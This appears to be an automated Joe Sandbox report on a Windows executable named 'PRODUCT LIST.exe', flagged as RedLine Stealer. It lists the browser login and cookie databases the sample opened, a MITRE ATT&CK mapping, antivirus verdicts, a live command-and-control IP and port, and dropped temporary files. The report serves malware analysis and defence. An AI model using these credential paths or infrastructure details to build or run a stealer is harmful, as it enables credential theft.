                Source: C:\Users\user\Desktop\PRODUCT LIST.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                Stealing of Sensitive Information

                barindex
                Yara detected RedLine Stealer
                Source: Yara matchFile source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: Yara matchFile source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected RedLine Stealer
                Source: Yara matchFile source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		741
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)561
                Virtualization/Sandbox Evasion                		Security Account Manager561
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information                		LSA Secrets114
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                Software Packing                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Timestomp                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PRODUCT LIST.exe55%ReversingLabsWin32.Trojan.Leonem
                PRODUCT LIST.exe100%AviraTR/Crypt.XPACK.Gen
                PRODUCT LIST.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://api.ipify.orgcookies//setti0%Avira URL Cloudsafe
                104.219.234.170:163830%Avira URL Cloudsafe
                http://104.219.234.170:16383t-0%Avira URL Cloudsafe
                https://api.ipify.orgcoo0%Avira URL Cloudsafe
                http://104.219.234.170:16383/0%Avira URL Cloudsafe
                http://104.219.234.170:163830%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                api.ip.sb
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  104.219.234.170:16383true
                  • Avira URL Cloud: safe
                  		unknown
                  http://104.219.234.170:16383/true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://104.219.234.170:16383t-PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ipinfo.io/ip%appdata%PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://duckduckgo.com/chrome_newtabtmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                      		high
                      https://duckduckgo.com/ac/?q=tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                        		high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousPRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://tempuri.org/Endpoint/CheckConnectResponsePRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.datacontract.org/2004/07/PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003433000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXPRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/Endpoint/EnvironmentSettingsPRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpfalse
                                      		high
                                      https://api.ip.sbPRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.ip.sb/geoipPRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/envelope/PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                                              		high
                                              http://tempuri.org/PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Endpoint/CheckConnectPRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                                                      		high
                                                      http://tempuri.org/Endpoint/VerifyUpdateResponsePRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Endpoint/SetEnvironmentPRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Endpoint/SetEnvironmentResponsePRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Endpoint/GetUpdatesPRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                                                                		high
                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILEPRODUCT LIST.exefalse
                                                                  		high
                                                                  https://api.ipify.orgcookies//settinString.RemovegPRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingPRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.ipify.orgcookies//settiPRODUCT LIST.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://tempuri.org/Endpoint/GetUpdatesResponsePRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                                                                          		high
                                                                          http://104.219.234.170:16383PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://tempuri.org/Endpoint/EnvironmentSettingsResponsePRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Endpoint/VerifyUpdatePRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://tempuri.org/0PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drfalse
                                                                                    		high
                                                                                    https://api.ipify.orgcooPRODUCT LIST.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/soap/actor/nextPRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.219.234.170
                                                                                      		unknownUnited States
                                                                                      		27176DATAWAGONUStrue

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1561829
                                                                                      Start date and time:2024-11-24 11:48:09 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 4m 39s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:5
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:PRODUCT LIST.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@2/39@1/1
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 59%
                                                                                      • Number of executed functions: 93
                                                                                      • Number of non-executed functions: 7
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
                                                                                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • VT rate limit hit for: PRODUCT LIST.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      05:49:13API Interceptor42x Sleep call for process: PRODUCT LIST.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      No context

                                                                                      Domains

                                                                                      No context

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      DATAWAGONUSZoom.exeGet hashmaliciousUnknownBrowse
                                                                                      • 172.81.130.139
                                                                                      Zoom.exeGet hashmaliciousPureCrypter, MicroClipBrowse
                                                                                      • 172.81.130.139
                                                                                      Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                      • 172.81.131.156
                                                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                      • 104.224.1.68
                                                                                      b39wW3jYKO.exeGet hashmaliciousStormKitty, XWormBrowse
                                                                                      • 104.219.239.11
                                                                                      http://104.219.233.181/fwd/P2Q9MjU2Mjc5JmVpPTcyODUyMjcyJmlmPTUxNDQyJm5kcD03OTgzJnNpPTE3JmxpPTIyMzczGet hashmaliciousPhisherBrowse
                                                                                      • 104.219.233.181
                                                                                      https://burnlyinvestments.co.ke/images/Get hashmaliciousUnknownBrowse
                                                                                      • 104.219.239.67
                                                                                      YjYoFznWQI.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • 104.219.239.104
                                                                                      R.F.Q. 93-2024.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                      • 104.219.239.104
                                                                                      R.F.Q. 93-2024.xlsGet hashmaliciousFormBookBrowse
                                                                                      • 104.219.239.104

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PRODUCT LIST.exe.log

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2666
                                                                                      Entropy (8bit):5.345804351520589
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpH8HKx1qHxLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5JcE
                                                                                      MD5:7ADCF08EB89A57934E566936815936CF
                                                                                      SHA1:C164331AA17656919323F4464BC1FC1EB1B8CA90
                                                                                      SHA-256:848A610C0FC09EF83A3DFC86A453C9B6F81DAA2A89779529254577F818E68933
                                                                                      SHA-512:54EB0F3313760BC4C88C736C5CE57B1890BBCD00376445B3BFC3BB17C6ACBCE22700491D96B6E7E926892555B2AC0C62F0C31557F0E00C00EA38D225228212D3
                                                                                      Malicious:true
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

                                                                                      C:\Users\user\AppData\Local\Temp\tmp2E0B.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp2E2B.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp2E2C.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp2E4C.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp2E4D.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp2E5E.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
